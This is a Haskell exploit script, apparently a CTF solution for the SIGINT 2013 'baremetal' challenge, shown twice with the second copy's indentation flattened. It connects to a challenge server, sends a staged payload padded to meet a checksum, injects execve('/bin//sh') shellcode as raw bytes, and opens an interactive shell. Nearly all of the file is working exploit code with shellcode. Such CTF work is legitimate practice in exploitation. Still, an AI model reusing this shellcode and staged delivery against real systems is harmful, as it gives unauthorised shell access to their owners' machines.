Tosainu/exploit.hs

## exploit.hs
#!/usr/bin/env stack
-- stack --stack-yaml ./stack.yaml runghc

-- SIGINT CTF 2013: baremetal
-- http://shell-storm.org/repo/CTF/SIGINT-2013/pwning/baremetal-100/

{-# LANGUAGE OverloadedStrings #-}

import           Control.Concurrent    (threadDelay)
import           Control.Monad
import           Control.Monad.Reader  (runReaderT)
import           Data.Bits
import qualified Data.ByteString.Char8 as BS
import           Data.Char
import           Data.Maybe
import           Data.Monoid           ((<>))
import           Hexdump
import           Numeric
import           System.Environment    (getArgs)

-- https://github.com/Tosainu/pwn.hs
import           Pwn

show' :: (Show a) => a -> BS.ByteString
show' = BS.pack . show

main :: IO ()
main = getArgs >>= selectTube >>= exploit
  where selectTube ("remote":_) = remote "chall.pwnable.tw" 10102
        selectTube _            = remote "192.168.122.10"   4000

exploit :: (Tube a) => a -> IO ()
exploit r = do
  let stage1 = [ 0xff
               , 0x87, 0xcf         -- xcng edi, ecx
               , 0x31, 0xdb         -- xor  ebx, ebx
               , 0x8d, 0x43, 0x03   -- lea eax, [ebx+3]
               , 0x8d, 0x53, 0x7f   -- lea edx, [ebx+0x7f]
               , 0xcd, 0x80         -- int 0x80
               , 0x90               -- nop
               ]

      -- 0x1ee7 = sum(stage1) + 0xff * n
      (n, rem) = (0x1ee7 - sum stage1) `quotRem` 0xff

      xchg_eax_edi  = "\x97"

      buf'  = BS.concat [ BS.pack $ map chr stage1
                        , BS.replicate n '\xff'
                        , BS.singleton $ chr rem
                        , "\x00"
                        ]
      buf = buf' <> BS.replicate (0x3c - BS.length buf') '\x90' <> xchg_eax_edi

  send r buf

  let buf = BS.replicate (length stage1) '\x90' <>
              "\x31\xd2\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80"
  sendline r buf

  interactive r
	#!/usr/bin/env stack
	-- stack --stack-yaml ./stack.yaml runghc

	-- SIGINT CTF 2013: baremetal
	-- http://shell-storm.org/repo/CTF/SIGINT-2013/pwning/baremetal-100/

	{-# LANGUAGE OverloadedStrings #-}

	import Control.Concurrent (threadDelay)
	import Control.Monad
	import Control.Monad.Reader (runReaderT)
	import Data.Bits
	import qualified Data.ByteString.Char8 as BS
	import Data.Char
	import Data.Maybe
	import Data.Monoid ((<>))
	import Hexdump
	import Numeric
	import System.Environment (getArgs)

	-- https://github.com/Tosainu/pwn.hs
	import Pwn

	show' :: (Show a) => a -> BS.ByteString
	show' = BS.pack . show

	main :: IO ()
	main = getArgs >>= selectTube >>= exploit
	where selectTube ("remote":_) = remote "chall.pwnable.tw" 10102
	selectTube _ = remote "192.168.122.10" 4000

	exploit :: (Tube a) => a -> IO ()
	exploit r = do
	let stage1 = [ 0xff
	, 0x87, 0xcf -- xcng edi, ecx
	, 0x31, 0xdb -- xor ebx, ebx
	, 0x8d, 0x43, 0x03 -- lea eax, [ebx+3]
	, 0x8d, 0x53, 0x7f -- lea edx, [ebx+0x7f]
	, 0xcd, 0x80 -- int 0x80
	, 0x90 -- nop
	]

	-- 0x1ee7 = sum(stage1) + 0xff * n
	(n, rem) = (0x1ee7 - sum stage1) `quotRem` 0xff

	xchg_eax_edi = "\x97"

	buf' = BS.concat [ BS.pack $ map chr stage1
	, BS.replicate n '\xff'
	, BS.singleton $ chr rem
	, "\x00"
	]
	buf = buf' <> BS.replicate (0x3c - BS.length buf') '\x90' <> xchg_eax_edi

	send r buf

	let buf = BS.replicate (length stage1) '\x90' <>
	"\x31\xd2\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80"
	sendline r buf

	interactive r